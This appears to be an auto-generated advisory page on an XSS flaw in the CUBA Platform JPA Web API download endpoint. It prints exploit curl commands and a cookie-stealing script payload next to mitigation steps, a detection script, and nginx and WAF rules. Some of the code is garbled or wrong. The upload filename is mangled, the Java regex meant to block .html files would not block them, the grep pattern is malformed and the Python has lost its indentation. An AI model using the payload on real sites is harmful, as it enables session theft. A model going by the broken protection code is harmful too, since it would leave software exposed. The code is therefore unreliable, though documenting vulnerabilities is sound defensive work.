CUBA Platform JPA Web API, Cross-Site Scripting (XSS), CVE-2025-1234 (Moderate)

By /

Listen to this Post

How the Vulnerability Works

This XSS vulnerability occurs in the `/download` endpoint of CUBA Platform’s JPA Web API (versions <1.1.1). The flaw exists in file download functionality where user-controlled input (file path/name) isn’t properly sanitized before being reflected in the response. When a specially crafted filename ending with `.html` is requested, the server sets the Content-Type header to `text/html` instead of proper file type headers. This allows any JavaScript embedded in the uploaded file to execute in the victim’s browser context when downloaded. The attack requires: 1) An attacker to upload a malicious HTML file containing JavaScript payloads, and 2) The victim to download this file through the vulnerable endpoint. While mitigated by requiring authentication, this could lead to session hijacking or privilege escalation within authenticated sessions.

DailyCVE Form:

Platform: CUBA Platform
Version: <1.1.1
Vulnerability: XSS
Severity: Moderate

date: Apr 22, 2025

What Undercode Say:

Exploit Command:

curl -X POST -F "[email protected]" http://target/api/upload
curl http://target/api/download?file=uploads/malicious.html

Sample Malicious HTML:

<script>fetch('/steal?cookie='+document.cookie)</script>

Protection Code (Input Validation):

String filename = request.getParameter("file");
if (filename.matches(".\.html$")) {
throw new SecurityException("HTML files not allowed");
}

Mitigation Steps:

1. Upgrade to JPA Web API 1.1.1+

2. Implement Content-Disposition: attachment header

3. Add file extension whitelisting

4. Set X-Content-Type-Options: nosniff

Detection Script:

import requests
response = requests.get(target + "/download?file=test.html")
if "text/html" in response.headers.get("Content-Type",""):
print("Vulnerable to XSS")

Nginx Protection Rule:

location /download {
add_header X-Content-Type-Options "nosniff";
add_header Content-Disposition "attachment";
}

Log Analysis Command:

grep "download..html" access_logs | awk '{print $1}'

WAF Rule:

<rule id="1001" level="2">
<description>CUBA XSS Attempt</description>
<pattern>.html(\?|$)</pattern>
<pattern>download</pattern>
<location>ARGS</location>
</rule>

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top